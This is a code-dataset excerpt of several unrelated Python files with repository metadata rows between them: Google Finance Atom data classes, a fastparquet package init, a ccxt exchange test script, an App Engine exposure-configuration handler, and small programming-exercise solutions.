# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Finance."""
from __future__ import unicode_literals
__author__ = '[email protected]'
import atom
import gdata
GD_NAMESPACE = 'http://schemas.google.com/g/2005'
GF_NAMESPACE = 'http://schemas.google.com/finance/2007'
class Money(atom.AtomBase):
"""The <gd:money> element."""
_tag = 'money'
_namespace = GD_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['amount'] = 'amount'
_attributes['currencyCode'] = 'currency_code'
def __init__(self, amount=None, currency_code=None, **kwargs):
self.amount = amount
self.currency_code = currency_code
atom.AtomBase.__init__(self, **kwargs)
def __str__(self):
return "%s %s" % (self.amount, self.currency_code)
def MoneyFromString(xml_string):
return atom.CreateClassFromXMLString(Money, xml_string)
class _Monies(atom.AtomBase):
"""An element containing multiple <gd:money> in multiple currencies."""
_namespace = GF_NAMESPACE
_children = atom.AtomBase._children.copy()
_children['{%s}money' % GD_NAMESPACE] = ('money', [Money])
def __init__(self, money=None, **kwargs):
self.money = money or []
atom.AtomBase.__init__(self, **kwargs)
def __str__(self):
return " / ".join(["%s" % i for i in self.money])
class CostBasis(_Monies):
"""The <gf:costBasis> element."""
_tag = 'costBasis'
def CostBasisFromString(xml_string):
return atom.CreateClassFromXMLString(CostBasis, xml_string)
class DaysGain(_Monies):
"""The <gf:daysGain> element."""
_tag = 'daysGain'
def DaysGainFromString(xml_string):
return atom.CreateClassFromXMLString(DaysGain, xml_string)
class Gain(_Monies):
"""The <gf:gain> element."""
_tag = 'gain'
def GainFromString(xml_string):
return atom.CreateClassFromXMLString(Gain, xml_string)
class MarketValue(_Monies):
"""The <gf:marketValue> element."""
_tag = 'gain'
_tag = 'marketValue'
def MarketValueFromString(xml_string):
return atom.CreateClassFromXMLString(MarketValue, xml_string)
class Commission(_Monies):
"""The <gf:commission> element."""
_tag = 'commission'
def CommissionFromString(xml_string):
return atom.CreateClassFromXMLString(Commission, xml_string)
class Price(_Monies):
"""The <gf:price> element."""
_tag = 'price'
def PriceFromString(xml_string):
return atom.CreateClassFromXMLString(Price, xml_string)
class Symbol(atom.AtomBase):
"""The <gf:symbol> element."""
_tag = 'symbol'
_namespace = GF_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['fullName'] = 'full_name'
_attributes['exchange'] = 'exchange'
_attributes['symbol'] = 'symbol'
def __init__(self, full_name=None, exchange=None, symbol=None, **kwargs):
self.full_name = full_name
self.exchange = exchange
self.symbol = symbol
atom.AtomBase.__init__(self, **kwargs)
def __str__(self):
return "%s:%s (%s)" % (self.exchange, self.symbol, self.full_name)
def SymbolFromString(xml_string):
return atom.CreateClassFromXMLString(Symbol, xml_string)
class TransactionData(atom.AtomBase):
"""The <gf:transactionData> element."""
_tag = 'transactionData'
_namespace = GF_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['type'] = 'type'
_attributes['date'] = 'date'
_attributes['shares'] = 'shares'
_attributes['notes'] = 'notes'
_children = atom.AtomBase._children.copy()
_children['{%s}commission' % GF_NAMESPACE] = ('commission', Commission)
_children['{%s}price' % GF_NAMESPACE] = ('price', Price)
def __init__(self, type=None, date=None, shares=None,
notes=None, commission=None, price=None, **kwargs):
self.type = type
self.date = date
self.shares = shares
self.notes = notes
self.commission = commission
self.price = price
atom.AtomBase.__init__(self, **kwargs)
def TransactionDataFromString(xml_string):
return atom.CreateClassFromXMLString(TransactionData, xml_string)
class TransactionEntry(gdata.GDataEntry):
"""An entry of the transaction feed.
A TransactionEntry contains TransactionData such as the transaction
type (Buy, Sell, Sell Short, or Buy to Cover), the number of units,
the date, the price, any commission, and any notes.
"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_children['{%s}transactionData' % GF_NAMESPACE] = (
'transaction_data', TransactionData)
def __init__(self, transaction_data=None, **kwargs):
self.transaction_data = transaction_data
gdata.GDataEntry.__init__(self, **kwargs)
def transaction_id(self):
return self.id.text.split("/")[-1]
transaction_id = property(transaction_id, doc='The transaction ID.')
def TransactionEntryFromString(xml_string):
return atom.CreateClassFromXMLString(TransactionEntry, xml_string)
class TransactionFeed(gdata.GDataFeed):
"""A feed that lists all of the transactions that have been recorded for
a particular position.
A transaction is a collection of information about an instance of
buying or selling a particular security. The TransactionFeed lists all
of the transactions that have been recorded for a particular position
as a list of TransactionEntries.
"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [TransactionEntry])
def TransactionFeedFromString(xml_string):
return atom.CreateClassFromXMLString(TransactionFeed, xml_string)
class TransactionFeedLink(atom.AtomBase):
"""Link to TransactionFeed embedded in PositionEntry.
If a PositionFeed is queried with transactions='true', TransactionFeeds
are inlined in the returned PositionEntries. These TransactionFeeds are
accessible via TransactionFeedLink's feed attribute.
"""
_tag = 'feedLink'
_namespace = GD_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['href'] = 'href'
_children = atom.AtomBase._children.copy()
_children['{%s}feed' % atom.ATOM_NAMESPACE] = (
'feed', TransactionFeed)
def __init__(self, href=None, feed=None, **kwargs):
self.href = href
self.feed = feed
atom.AtomBase.__init__(self, **kwargs)
class PositionData(atom.AtomBase):
"""The <gf:positionData> element."""
_tag = 'positionData'
_namespace = GF_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['gainPercentage'] = 'gain_percentage'
_attributes['return1w'] = 'return1w'
_attributes['return4w'] = 'return4w'
_attributes['return3m'] = 'return3m'
_attributes['returnYTD'] = 'returnYTD'
_attributes['return1y'] = 'return1y'
_attributes['return3y'] = 'return3y'
_attributes['return5y'] = 'return5y'
_attributes['returnOverall'] = 'return_overall'
_attributes['shares'] = 'shares'
_children = atom.AtomBase._children.copy()
_children['{%s}costBasis' % GF_NAMESPACE] = ('cost_basis', CostBasis)
_children['{%s}daysGain' % GF_NAMESPACE] = ('days_gain', DaysGain)
_children['{%s}gain' % GF_NAMESPACE] = ('gain', Gain)
_children['{%s}marketValue' % GF_NAMESPACE] = ('market_value', MarketValue)
def __init__(self, gain_percentage=None,
return1w=None, return4w=None, return3m=None, returnYTD=None,
return1y=None, return3y=None, return5y=None, return_overall=None,
shares=None, cost_basis=None, days_gain=None,
gain=None, market_value=None, **kwargs):
self.gain_percentage = gain_percentage
self.return1w = return1w
self.return4w = return4w
self.return3m = return3m
self.returnYTD = returnYTD
self.return1y = return1y
self.return3y = return3y
self.return5y = return5y
self.return_overall = return_overall
self.shares = shares
self.cost_basis = cost_basis
self.days_gain = days_gain
self.gain = gain
self.market_value = market_value
atom.AtomBase.__init__(self, **kwargs)
def PositionDataFromString(xml_string):
return atom.CreateClassFromXMLString(PositionData, xml_string)
class PositionEntry(gdata.GDataEntry):
"""An entry of the position feed.
A PositionEntry contains the ticker exchange and Symbol for a stock,
mutual fund, or other security, along with PositionData such as the
number of units of that security that the user holds, and performance
statistics.
"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_children['{%s}positionData' % GF_NAMESPACE] = (
'position_data', PositionData)
_children['{%s}symbol' % GF_NAMESPACE] = ('symbol', Symbol)
_children['{%s}feedLink' % GD_NAMESPACE] = (
'feed_link', TransactionFeedLink)
def __init__(self, position_data=None, symbol=None, feed_link=None,
**kwargs):
self.position_data = position_data
self.symbol = symbol
self.feed_link = feed_link
gdata.GDataEntry.__init__(self, **kwargs)
def position_title(self):
return self.title.text
position_title = property(position_title,
doc='The position title as a string (i.e. position.title.text).')
def ticker_id(self):
return self.id.text.split("/")[-1]
ticker_id = property(ticker_id, doc='The position TICKER ID.')
def transactions(self):
if self.feed_link.feed:
return self.feed_link.feed.entry
else:
return None
transactions = property(transactions, doc="""
Inlined TransactionEntries are returned if PositionFeed is queried
with transactions='true'.""")
def PositionEntryFromString(xml_string):
return atom.CreateClassFromXMLString(PositionEntry, xml_string)
class PositionFeed(gdata.GDataFeed):
"""A feed that lists all of the positions in a particular portfolio.
A position is a collection of information about a security that the
user holds. The PositionFeed lists all of the positions in a particular
portfolio as a list of PositionEntries.
"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PositionEntry])
def PositionFeedFromString(xml_string):
return atom.CreateClassFromXMLString(PositionFeed, xml_string)
class PositionFeedLink(atom.AtomBase):
"""Link to PositionFeed embedded in PortfolioEntry.
If a PortfolioFeed is queried with positions='true', the PositionFeeds
are inlined in the returned PortfolioEntries. These PositionFeeds are
accessible via PositionFeedLink's feed attribute.
"""
_tag = 'feedLink'
_namespace = GD_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['href'] = 'href'
_children = atom.AtomBase._children.copy()
_children['{%s}feed' % atom.ATOM_NAMESPACE] = (
'feed', PositionFeed)
def __init__(self, href=None, feed=None, **kwargs):
self.href = href
self.feed = feed
atom.AtomBase.__init__(self, **kwargs)
class PortfolioData(atom.AtomBase):
"""The <gf:portfolioData> element."""
_tag = 'portfolioData'
_namespace = GF_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['currencyCode'] = 'currency_code'
_attributes['gainPercentage'] = 'gain_percentage'
_attributes['return1w'] = 'return1w'
_attributes['return4w'] = 'return4w'
_attributes['return3m'] = 'return3m'
_attributes['returnYTD'] = 'returnYTD'
_attributes['return1y'] = 'return1y'
_attributes['return3y'] = 'return3y'
_attributes['return5y'] = 'return5y'
_attributes['returnOverall'] = 'return_overall'
_children = atom.AtomBase._children.copy()
_children['{%s}costBasis' % GF_NAMESPACE] = ('cost_basis', CostBasis)
_children['{%s}daysGain' % GF_NAMESPACE] = ('days_gain', DaysGain)
_children['{%s}gain' % GF_NAMESPACE] = ('gain', Gain)
_children['{%s}marketValue' % GF_NAMESPACE] = ('market_value', MarketValue)
def __init__(self, currency_code=None, gain_percentage=None,
return1w=None, return4w=None, return3m=None, returnYTD=None,
return1y=None, return3y=None, return5y=None, return_overall=None,
cost_basis=None, days_gain=None, gain=None, market_value=None, **kwargs):
self.currency_code = currency_code
self.gain_percentage = gain_percentage
self.return1w = return1w
self.return4w = return4w
self.return3m = return3m
self.returnYTD = returnYTD
self.return1y = return1y
self.return3y = return3y
self.return5y = return5y
self.return_overall = return_overall
self.cost_basis = cost_basis
self.days_gain = days_gain
self.gain = gain
self.market_value = market_value
atom.AtomBase.__init__(self, **kwargs)
def PortfolioDataFromString(xml_string):
return atom.CreateClassFromXMLString(PortfolioData, xml_string)
class PortfolioEntry(gdata.GDataEntry):
"""An entry of the PortfolioFeed.
A PortfolioEntry contains the portfolio's title along with PortfolioData
such as currency, total market value, and overall performance statistics.
"""
_tag = 'entry'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_children['{%s}portfolioData' % GF_NAMESPACE] = (
'portfolio_data', PortfolioData)
_children['{%s}feedLink' % GD_NAMESPACE] = (
'feed_link', PositionFeedLink)
def __init__(self, portfolio_data=None, feed_link=None, **kwargs):
self.portfolio_data = portfolio_data
self.feed_link = feed_link
gdata.GDataEntry.__init__(self, **kwargs)
def portfolio_title(self):
return self.title.text
def set_portfolio_title(self, portfolio_title):
self.title = atom.Title(text=portfolio_title, title_type='text')
portfolio_title = property(portfolio_title, set_portfolio_title,
doc='The portfolio title as a string (i.e. portfolio.title.text).')
def portfolio_id(self):
return self.id.text.split("/")[-1]
portfolio_id = property(portfolio_id,
doc='The portfolio ID. Do not confuse with portfolio.id.')
def positions(self):
if self.feed_link.feed:
return self.feed_link.feed.entry
else:
return None
positions = property(positions, doc="""
Inlined PositionEntries are returned if PortfolioFeed was queried
with positions='true'.""")
def PortfolioEntryFromString(xml_string):
return atom.CreateClassFromXMLString(PortfolioEntry, xml_string)
class PortfolioFeed(gdata.GDataFeed):
"""A feed that lists all of the user's portfolios.
A portfolio is a collection of positions that the user holds in various
securities, plus metadata. The PortfolioFeed lists all of the user's
portfolios as a list of PortfolioEntries.
"""
_tag = 'feed'
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PortfolioEntry])
def PortfolioFeedFromString(xml_string):
return atom.CreateClassFromXMLString(PortfolioFeed, xml_string)
| [
"[email protected]"
] | |
5bf6d8e5da9416d75daaa4e067ae7119ca58f647 | c2c6798ced0db33b2669f11f2434596c61496aef | /fastparquet/__init__.py | 38dec432f8c525661a842f3d0a7c473b1fa9f2e3 | [
"Apache-2.0"
] | permissive | PGryllos/fastparquet | e037b0d5e6387746f82e91fd9b4240962f178308 | 07401c501dbfc55c456052413f0c904483c68b50 | refs/heads/master | 2020-04-04T19:09:27.392744 | 2018-10-24T18:31:06 | 2018-10-24T18:31:06 | 156,194,372 | 0 | 0 | Apache-2.0 | 2018-11-05T09:46:52 | 2018-11-05T09:46:52 | null | UTF-8 | Python | false | false | 424 | py | """parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
__version__ = "0.1.6"
| [
"[email protected]"
] | |
36411eb463c030ab4360eebfa9af78fa62396e0f | 5e434bcedb9cfd14b26d7c8a2dc6ccdf132a8b83 | /test/test.py | 04a91fd7df5dae6a21c2e573a7b2a1b86f8f9d36 | [
"MIT"
] | permissive | mindw00rk/ccxt | 5884e73ac871e66bdfd0e86f6634e141b008b967 | b2f9ee175ea93d70b3699081fd84285f63254fec | refs/heads/master | 2021-07-08T20:12:30.199246 | 2017-09-28T06:58:45 | 2017-09-28T06:58:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,764 | py | # -*- coding: utf-8 -*-
import argparse
import os
import sys
import json
import time
from os import _exit
from traceback import format_tb
# ------------------------------------------------------------------------------
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(root)
# ------------------------------------------------------------------------------
import ccxt # noqa: E402
# ------------------------------------------------------------------------------
class Argv(object):
pass
argv = Argv()
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', action='store_true', help='enable verbose output')
parser.add_argument('--nonce', type=int, help='integer')
parser.add_argument('exchange', type=str, help='exchange id in lowercase', nargs='?')
parser.add_argument('symbol', type=str, help='symbol in uppercase', nargs='?')
parser.parse_args(namespace=argv)
exchanges = {}
# ------------------------------------------------------------------------------
# string coloring functions
def style(s, style):
return str(s) # style + str (s) + '\033[0m'
def green(s):
return style(s, '\033[92m')
def blue(s):
return style(s, '\033[94m')
def yellow(s):
return style(s, '\033[93m')
def red(s):
return style(s, '\033[91m')
def pink(s):
return style(s, '\033[95m')
def bold(s):
return style(s, '\033[1m')
def underline(s):
return style(s, '\033[4m')
# print a colored string
def dump(*args):
print(' '.join([str(arg) for arg in args]))
# print a n error string
def dump_error(*args):
string = ' '.join([str(arg) for arg in args])
# print(string)
sys.stderr.write(string + "\n")
# ------------------------------------------------------------------------------
def handle_all_unhandled_exceptions(type, value, traceback):
dump_error(yellow(str(type) + ' ' + value + '\n\n' + '\n'.join(format_tb(traceback))))
_exit(1) # unrecoverable crash
sys.excepthook = handle_all_unhandled_exceptions
# ------------------------------------------------------------------------------
def test_order_book(exchange, symbol):
if exchange.hasFetchOrderBook:
delay = int(exchange.rateLimit / 1000)
time.sleep(delay)
dump(green(exchange.id), green(symbol), 'fetching order book...')
orderbook = exchange.fetch_order_book(symbol)
dump(
green(exchange.id),
green(symbol),
'order book',
orderbook['datetime'],
'bid: ' + str(orderbook['bids'][0][0] if len(orderbook['bids']) else 'N/A'),
'bidVolume: ' + str(orderbook['bids'][0][1] if len(orderbook['bids']) else 'N/A'),
'ask: ' + str(orderbook['asks'][0][0] if len(orderbook['asks']) else 'N/A'),
'askVolume: ' + str(orderbook['asks'][0][1] if len(orderbook['asks']) else 'N/A'))
else:
dump(yellow(exchange.id), 'fetch_order_book() supported')
# ------------------------------------------------------------------------------
def test_ohlcv(exchange, symbol):
if exchange.hasFetchOHLCV:
delay = int(exchange.rateLimit / 1000)
time.sleep(delay)
ohlcvs = exchange.fetch_ohlcv(symbol)
dump(green(exchange.id), 'fetched', green(len(ohlcvs)), 'OHLCVs')
else:
dump(yellow(exchange.id), 'fetch_ohlcv() not supported')
# ------------------------------------------------------------------------------
def test_tickers(exchange):
if exchange.hasFetchTickers:
delay = int(exchange.rateLimit / 1000)
time.sleep(delay)
dump(green(exchange.id), 'fetching all tickers at once...')
tickers = exchange.fetch_tickers()
dump(green(exchange.id), 'fetched', green(len(list(tickers.keys()))), 'tickers')
else:
dump(yellow(exchange.id), 'fetch_tickers() not supported')
# ------------------------------------------------------------------------------
def test_ticker(exchange, symbol):
if exchange.hasFetchTicker:
delay = int(exchange.rateLimit / 1000)
time.sleep(delay)
dump(green(exchange.id), green(symbol), 'fetching ticker...')
ticker = exchange.fetch_ticker(symbol)
dump(
green(exchange.id),
green(symbol),
'ticker',
ticker['datetime'],
'high: ' + str(ticker['high']),
'low: ' + str(ticker['low']),
'bid: ' + str(ticker['bid']),
'ask: ' + str(ticker['ask']),
'volume: ' + str(ticker['quoteVolume']))
else:
dump(green(exchange.id), green(symbol), 'fetch_ticker() not supported')
# ------------------------------------------------------------------------------
def test_trades(exchange, symbol):
if exchange.hasFetchTrades:
delay = int(exchange.rateLimit / 1000)
time.sleep(delay)
dump(green(exchange.id), green(symbol), 'fetching trades...')
trades = exchange.fetch_trades(symbol)
dump(green(exchange.id), green(symbol), 'fetched', green(len(list(trades))), 'trades')
else:
dump(green(exchange.id), green(symbol), 'fetch_trades() not supported')
# ------------------------------------------------------------------------------
def test_symbol(exchange, symbol):
dump(green('SYMBOL: ' + symbol))
test_ticker(exchange, symbol)
if exchange.id == 'coinmarketcap':
dump(green(exchange.fetchGlobal()))
else:
test_order_book(exchange, symbol)
test_trades(exchange, symbol)
test_tickers(exchange)
test_ohlcv(exchange, symbol)
# ------------------------------------------------------------------------------
def load_exchange(exchange):
exchange.load_markets()
def test_exchange(exchange):
dump(green('EXCHANGE: ' + exchange.id))
# delay = 2
keys = list(exchange.markets.keys())
# ..........................................................................
# public API
symbol = keys[0]
symbols = [
'BTC/USD',
'BTC/CNY',
'BTC/EUR',
'BTC/ETH',
'ETH/BTC',
'BTC/JPY',
'LTC/BTC',
'USD/SLL',
]
for s in symbols:
if s in keys:
symbol = s
break
if symbol.find('.d') < 0:
test_symbol(exchange, symbol)
# ..........................................................................
# private API
if (not hasattr(exchange, 'apiKey') or (len(exchange.apiKey) < 1)):
return
dump(green(exchange.id), 'fetching balance...')
# balance = exchange.fetch_balance()
exchange.fetch_balance()
dump(green(exchange.id), 'fetched balance')
if exchange.hasFetchOrders:
try:
dump(green(exchange.id), 'fetching orders...')
orders = exchange.fetch_orders()
dump(green(exchange.id), 'fetched', green(str(len(orders))), 'orders')
except (ccxt.ExchangeError, ccxt.NotSupported) as e:
dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
# except ccxt.NotSupported as e:
# dump(yellow(type(e).__name__), e.args)
# time.sleep(delay)
# amount = 1
# price = 0.0161
# marketBuy = exchange.create_market_buy_order(symbol, amount)
# print(marketBuy)
# time.sleep(delay)
# marketSell = exchange.create_market_sell_order(symbol, amount)
# print(marketSell)
# time.sleep(delay)
# limitBuy = exchange.create_limit_buy_order(symbol, amount, price)
# print(limitBuy)
# time.sleep(delay)
# limitSell = exchange.create_limit_sell_order(symbol, amount, price)
# print(limitSell)
# time.sleep(delay)
# ------------------------------------------------------------------------------
def try_all_proxies(exchange, proxies):
current_proxy = 0
max_retries = len(proxies)
if exchange.proxy:
current_proxy = proxies.index(exchange.proxy)
for num_retries in range(0, max_retries):
try:
exchange.proxy = proxies[current_proxy]
dump(green(exchange.id), 'using proxy', '`' + exchange.proxy + '`')
current_proxy = (current_proxy + 1) % len(proxies)
load_exchange(exchange)
test_exchange(exchange)
break
except ccxt.RequestTimeout as e:
dump_error(yellow('[' + type(e).__name__ + ']'), str(e))
except ccxt.NotSupported as e:
dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
except ccxt.DDoSProtection as e:
dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
except ccxt.ExchangeNotAvailable as e:
dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
except ccxt.AuthenticationError as e:
dump_error(yellow('[' + type(e).__name__ + ']'), str(e))
except ccxt.ExchangeError as e:
dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
# ------------------------------------------------------------------------------
proxies = [
'',
'https://cors-anywhere.herokuapp.com/',
'https://crossorigin.me/',
]
# prefer local testing keys to global keys
keys_global = './keys.json'
keys_local = './keys.local.json'
keys_file = keys_local if os.path.exists(keys_local) else keys_global
# load the api keys from config
with open(keys_file) as file:
config = json.load(file)
# instantiate all exchanges
for id in ccxt.exchanges:
exchange = getattr(ccxt, id)
exchanges[id] = exchange({'verbose': argv.verbose})
# set up api keys appropriately
tuples = list(ccxt.Exchange.keysort(config).items())
for (id, params) in tuples:
if id in exchanges:
options = list(params.items())
for key in params:
setattr(exchanges[id], key, params[key])
# ------------------------------------------------------------------------------
def main():
if argv.exchange:
exchange = exchanges[argv.exchange]
symbol = argv.symbol
if hasattr(exchange, 'skip') and exchange.skip:
dump(green(exchange.id), 'skipped')
else:
if symbol:
load_exchange(exchange)
test_symbol(exchange, symbol)
else:
try_all_proxies(exchange, proxies)
else:
tuples = list(ccxt.Exchange.keysort(exchanges).items())
for (id, params) in tuples:
if id in exchanges:
exchange = exchanges[id]
if hasattr(exchange, 'skip') and exchange.skip:
dump(green(exchange.id), 'skipped')
else:
try_all_proxies(exchange, proxies)
# ------------------------------------------------------------------------------
main()
| [
"[email protected]"
] | |
2f0a611da567bf2a6e1eedcb7042f1a475d9f211 | d89a482aaf3001bbc4515f39af9ba474e1ae6062 | /ubertool/exposure_output.py | 4a6a41f37b05e878207260f2803b50a2a59f17da | [] | no_license | hongtao510/u_tool | 2925e3694aba81714cf83018c3f8520a7b503228 | 98c962cfb1f53c4971fb2b9ae22c882c0fae6497 | refs/heads/master | 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,183 | py | import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
import cgi
import cgitb
cgitb.enable()
import datetime
from ubertool.exposure import Exposure
import logging
class UbertoolExposureConfigurationPage(webapp.RequestHandler):
def post(self):
logger = logging.getLogger("UbertoolExposureConfigurationPage")
form = cgi.FieldStorage()
config_name = str(form.getvalue('config_name'))
user = users.get_current_user()
q = db.Query(Exposure)
q.filter('user =',user)
q.filter("config_name =", config_name)
exposure = q.get()
if exposure is None:
exposure = Exposure()
if user:
logger.info(user.user_id())
exposure.user = user
exposure.config_name = config_name
exposure.cas_number = str(form.getvalue('cas_number'))
exposure.formulated_product_name = form.getvalue('formulated_product_name')
exposure.met_file = form.getvalue('metfile')
exposure.przm_scenario = form.getvalue('PRZM_scenario')
exposure.exams_environment_file = form.getvalue('EXAMS_environment_file')
exposure.application_method = form.getvalue('application_mathod')
exposure.app_type = form.getvalue('app_type')
exposure.weight_of_one_granule = float(form.getvalue('weight_of_one_granule'))
exposure.wetted_in = bool(form.getvalue('wetted_in'))
exposure.incorporation_depth = float(form.getvalue('incorporation_depth'))
exposure.application_kg_rate = float(form.getvalue('application_kg_rate'))
exposure.application_lbs_rate = float(form.getvalue('application_lbs_rate'))
exposure.application_rate_per_use = float(form.getvalue('application_rate_per_use'))
logger.info(form.getvalue("application_date"))
#TODO This is NASTY we should consider using Date Chooser or something with only one valid output
app_data = form.getvalue('application_date')
app_data_parts = app_data.split("-")
exposure.application_date = datetime.date(int(app_data_parts[0]),int(app_data_parts[1]),int(app_data_parts[2]))
exposure.interval_between_applications = float(form.getvalue('interval_between_applications'))
exposure.application_efficiency = float(form.getvalue('application_efficiency'))
exposure.percent_incorporated = float(form.getvalue('percent_incorporated'))
exposure.spray_drift = float(form.getvalue('spray_drift'))
exposure.runoff = float(form.getvalue('runoff'))
exposure.one_in_ten_peak_exposure_concentration = float(form.getvalue('one_in_ten_peak_exposure_concentration'))
exposure.one_in_ten_four_day_average_exposure_concentration = float(form.getvalue('one_in_ten_four_day_average_exposure_concentration'))
exposure.one_in_ten_twentyone_day_average_exposure_concentration = float(form.getvalue('one_in_ten_twentyone_day_average_exposure_concentration'))
exposure.one_in_ten_sixty_day_average_exposure_concentration = float(form.getvalue('one_in_ten_sixty_day_average_exposure_concentration'))
exposure.one_in_ten_ninety_day_average_exposure_concentration = float(form.getvalue('one_in_ten_ninety_day_average_exposure_concentration'))
exposure.maximum_peak_exposure_concentration = float(form.getvalue('maximum_peak_exposure_concentration'))
exposure.maximum_four_day_average_exposure_concentration = float(form.getvalue('maximum_four_day_average_exposure_concentration'))
exposure.maximum_twentyone_day_average_exposure_concentration = float(form.getvalue('maximum_twentyone_day_average_exposure_concentration'))
exposure.maximum_sixty_day_average_exposure_concentration = float(form.getvalue('maximum_sixty_day_average_exposure_concentration'))
exposure.maximum_ninety_day_average_exposure_concentration = float(form.getvalue('maximum_ninety_day_average_exposure_concentration'))
exposure.pore_water_peak_exposure_concentration = float(form.getvalue('pore_water_peak_exposure_concentration'))
exposure.pore_water_four_day_average_exposure_concentration = float(form.getvalue('pore_water_four_day_average_exposure_concentration'))
exposure.pore_water_twentyone_day_average_exposure_concentration = float(form.getvalue('pore_water_twentyone_day_average_exposure_concentration'))
exposure.pore_water_sixty_day_average_exposure_concentration = float(form.getvalue('pore_water_sixty_day_average_exposure_concentration'))
exposure.pore_water_ninety_day_average_exposure_concentration = float(form.getvalue('pore_water_ninety_day_average_exposure_concentration'))
exposure.frac_pest_surface = float(form.getvalue('frac_pest_surface'))
exposure.put()
self.redirect("aquatic_toxicity.html")
app = webapp.WSGIApplication([('/.*', UbertoolExposureConfigurationPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
38b657507fa9116655cd0f1e6c4c24ea7c348d49 | a8a5b9c9c526b600b0b8395a1eaf4044355d6ad9 | /01_Basic/30_Output02(1032).py | 2a3d1b328802e1d3bc48038b9cab25e5e223e60f | [] | no_license | kiteB/CodeUp | a342e40720290758de3fcfff961813250eee9541 | f485f6c50a252e9cb6449c39a872a73561468415 | refs/heads/master | 2023-02-08T15:57:20.557421 | 2020-12-31T08:35:58 | 2020-12-31T08:35:58 | 323,678,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | # 10진수 정수를 입력받아 16진수로 출력하기
a = int(input())
print('%x' %a) | [
"[email protected]"
] | |
b0853a9aba65d24c4142d61fcce38fcedb426468 | 2420a09930fcc1a0d3c67a0791be70ddee418f4a | /Kth_Largest_Element_in_an_Array.py | d08f8e38b151d423cded627522ff355833c7db5b | [] | no_license | Superbeet/LeetCode | eff8c2562fb5724b89bc2b05ab230a21b67a9e5a | a1b14fc7ecab09a838d70e0130ece27fb0fef7fd | refs/heads/master | 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,727 | py | # Use Bubble k times - Time Complexity: O(nk)
class Solution3(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
for i in xrange(0, k):
for j in xrange(0, size-1-i):
if nums[j]>nums[j+1]:
nums[j],nums[j+1] = nums[j+1], nums[j]
return nums[-k]
# Time complexity: O(k + (n-k)Logk) <~> O(nlogk)
import heapq
class MinHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return heapq.heappop(self.data)
class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
if not nums:
return None
size = len(nums)
heap = MinHeap(k)
for i in xrange(0, size):
heap.push(nums[i])
return heap.pop()
# Time: O(n+klogn)
class MaxHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
element = -element
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return -heapq.heappop(self.data)
class Solution2(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
heap = MaxHeap(size)
for i in xrange(0, size):
heap.push(nums[i])
for j in xrange(k-1):
heap.pop()
return heap.pop()
sol = Solution()
sol2 = Solution2()
sol3 = Solution3()
nums = [3,2,1,5,6,4,11,8,7]
print sol.findKthLargest(nums, 2)
print sol2.findKthLargest(nums, 2)
print sol3.findKthLargest(nums, 2)
| [
"[email protected]"
] | |
